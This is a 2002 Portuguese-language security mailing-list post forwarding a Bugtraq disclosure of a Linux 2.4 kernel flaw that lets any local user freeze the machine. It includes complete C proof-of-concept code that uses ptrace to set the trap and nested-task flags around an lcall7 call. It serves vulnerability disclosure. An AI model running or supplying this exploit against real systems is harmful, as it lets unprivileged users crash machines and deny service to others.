[SECURITY-L] DOS no kernel do Linux

Daniela Regina Barbetti Silva daniela em ccuec.unicamp.br
Qui Nov 14 10:19:03 -02 2002 

----- Forwarded message from Leandro Martelli <martelli em on.br> -----

From: Leandro Martelli <martelli em on.br>
Subject: DOS no kernel do Linux
To: daniela em ccuec.unicamp.br
Date: 14 Nov 2002 09:49:03 -0200
Organization: 
X-Mailer: Ximian Evolution 1.2.0 

Cara Daniela,

Como ainda nao vi noticiado na lista, segue o link sobre um
bug no kernel que permite qualquer usuario local travar a maquina.


http://online.securityfocus.com/archive/1/299687

===
Martelli


-----------------------------------------------------------
>Regarding this issue: is it 80x86 or specifically 80386 designed ?
> Been trying it on AMD Duron, AMD Athlon MP, Intel i586 - just segfaults :(
Yep; the first version of the DoS I posted on bugtraq was defective and
worked only under special conditions (inside gdb for example).

However this updated version works much better:

#include <sys/ptrace.h>

struct user_regs_struct {
        long ebx, ecx, edx, esi, edi, ebp, eax;
        unsigned short ds, __ds, es, __es;
        unsigned short fs, __fs, gs, __gs;
        long orig_eax, eip;
        unsigned short cs, __cs;
        long eflags, esp;
        unsigned short ss, __ss;
};

int main( void )
{
    int pid;
    char dos[] = "\x9A\x00\x00\x00\x00\x07\x00";
    void (* lcall7)( void ) = (void *) dos;
    struct user_regs_struct d;

    if( ! ( pid = fork() ) )
    {
        usleep( 1000 );
        (* lcall7)();
    }
    else
    {
        ptrace( PTRACE_ATTACH, pid, 0, 0 );
        while( 1 )
        {
            wait( 0 );
            ptrace( PTRACE_GETREGS, pid, 0, &d );
            d.eflags |= 0x4100; /* set TF and NT */
            ptrace( PTRACE_SETREGS, pid, 0, &d );
            ptrace( PTRACE_SYSCALL, pid, 0, 0 );
        }
    }

    return 1;
}

At the beginning I thought only kernels <= 2.4.18 were affected; but it
appeared that both kernels 2.4.19 and 2.4.20-rc1 are vulnerable as well.
The flaw seems to be related to the kernel's handling of the nested task 
(NT) flag inside a lcall7. 

-- 
Christophe Devine
---------------------------------------------------------


----- End forwarded message -----

Mais detalhes sobre a lista de discussão SECURITY-L